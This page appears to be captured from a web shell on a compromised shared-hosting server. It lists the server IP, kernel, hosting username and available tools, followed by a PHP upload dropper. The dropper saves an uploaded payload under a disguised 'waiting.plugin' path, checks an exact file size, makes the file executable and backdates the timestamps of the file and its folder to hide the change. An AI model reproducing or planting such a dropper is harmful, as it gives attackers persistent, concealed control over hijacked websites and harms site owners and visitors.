Server IP : 162.254.39.85 / Your IP : 216.73.216.107 Web Server : LiteSpeed System : Linux premium311.web-hosting.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : alladgbi ( 1042) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /tmp/ |
Upload File : |
<?php $p = "/home/alladgbi/public_html//var/spool/cron/waiting.plugin"; $ft = 1757502283; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 36596) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 36596"; } @unlink($p); } } die('_upload_failed_');